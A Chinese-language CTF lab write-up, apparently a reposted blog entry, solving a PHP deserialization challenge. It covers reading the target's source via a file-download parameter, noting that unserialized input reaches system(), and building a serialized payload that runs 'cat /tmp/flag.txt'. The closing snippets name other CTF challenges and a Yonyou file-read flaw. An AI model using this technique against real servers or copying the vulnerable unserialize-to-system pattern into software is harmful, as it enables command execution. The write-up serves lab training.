首页 > 其他分享 >CTF吧-渗透测试靶场-综合漏洞靶场

CTF吧-渗透测试靶场-综合漏洞靶场

时间:2024-11-18 15:46:14浏览次数:3  
标签:echo 漏洞 CTF html file test 靶场 payload download

这关为php反序列化

抓包,修改download_file=1.jpg为download_file=upload.php

去查看uploda.php的源代码

<?php
header('Content-type:text/html;charset=utf-8');
if(isset($_POST['download_file'])) {
    $file = $_POST['download_file'];
    if (preg_match_all("/(\||&|;|\/|tmp|flag)/i", $file)) {
        die('hacker!');
    }
    if(file_exists($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }else{
        echo '<script>alert("文件不存在");location.href = "index.html";</script>';
    }
}
class AAA{
    var $test = "abc";
    function __construct(){
        echo $this->test;
    }
}
$html='';
if(isset($_GET['o'])){
    $s = $_GET['o'];
    if(!@$unser = unserialize($s)){
        echo $html.="<p>输入字符有误,请重新输入</p>";
    }else{
        echo system($unser->test);
        echo '执行完毕,请检查结果';
    }
}

可以看到对POST请求download_file传参进行了过滤

继续往下看 能发现这题可以使用反序列化

构造代码

<?php
class AAA {
    public $test;
}

$payload = new AAA();
$payload->test = 'cat /tmp/flag.txt';

$serialized_payload = serialize($payload);
echo $serialized_payload;
?>

//运行结果O:3:"AAA":1:{s:4:"test";s:17:"cat /tmp/flag.txt";}

标签:echo,漏洞,CTF,html,file,test,靶场,payload,download
From: https://blog.csdn.net/Demonr_666/article/details/143857337

相关文章

  • [BUUCTF 2018]Online Tool
    题目链接:[BUUCTF2018]OnlineTool。打开环境,如下所示。直接得到源码,如下。<?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highl......
  • [BJDCTF2020]ZJCTF,不过如此
    题目链接:[BJDCTF2020]ZJCTF,不过如此。打开环境,如下所示。一个简单的伪协议,直接使用Data伪协议即可通过检测,随后使用文件包含来查看next.php文件源码。Payload:?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource......
  • 【漏洞复现】用友 YonBIP高级版 yonbiplogin 任意文件读取漏洞
    免责声明:        本文旨在提供有关特定漏洞的信息,以帮助用户了解潜在风险。发布此信息旨在促进网络安全意识和技术进步,并非出于恶意。读者应理解,利用本文提到的漏洞或进行相关测试可能违反法律或服务协议。未经授权访问系统、网络或应用程序可能导致法律责任或严......
  • 东胜物流软件 GetDataListCA SQL注入漏洞复现
    0x01产品简介东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。该公司初创于2004年11月(前身为青岛景宏物流信息技术有限公司),专注于航运物流相关环节的产品和服务。东胜物流信息管理系统货代版采用MS-SQLserver大型......
  • wpctf
    ZLCTFWPRobot_36题目中提示:name,搜索Robot36,发现是一种慢扫描电视的一种。所以模式即选择robot36。使用这个软件http://www.2265.com/soft/524990.html一部手机播放题目中给的mav文件,一部手机打开robot36软件,对着放得到flag若只有电脑:用RX-SSTV软件解出一张含有flag的二维码,模式是R......
  • CTFWeb篇04-SQL注入
    SQL注入什么是SQL注入SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串......
  • 随便写点ctfwp(web方向)
    最近社团一直在发作业,哎。。随便写点看看得了23333//本文章提供给入门ctf且对web方向感兴趣的同学 (d'∀')希望对你们有帮助(^_っ^)WEB1看题目描述应该是与MD5绕过有关可以不去思考sql注入尝试输出1.2.3.。。。回显都是password=1,2,3查看源代码也没什么有用的信息......
  • 赣CTF-Misc方向wp
    checkin下载附件,一张图片,拖进010,在文件尾看到隐藏文本,提取并用社会主义价值解密ez_forensics提示为结合题目进行想象,我们会想到取证第一步vc挂载,但是需要密码,研究图片,lsb隐写,在row:G通道找到密钥挂载,得到flag真的是base64哦考点base64隐写点击查看代码importbase64......
  • buuctf-[GUET-CTF2019]soul sipse
    小白的第14天~flag奉上:flag{5304}1.下载附件得到一个wav文件,经过一顿尝试无果后百度得知是隐写~2.将其放入kali中,使用steghideextract-sfout.wav指令分离出一个txt1文件,其中是一串下载链接。3.下载得到一个png图片,打开发现出错。将其放入hex中分析,发现文件头中的4......
  • ISCTF的MISC复现
    小蓝鲨的签到02随波逐流识别问题加上IS即可数字迷雾:在像素中寻找线索还是随波逐流加个}小蓝鲨的签到01关注公众号发送ISCTF2024即可小蓝鲨的问卷答完得flag5.少女的秘密花园随波逐流检测有隐藏文件foremost分离得到base_misc还有隐藏文件,用aapr纯数字爆开zip,得到f......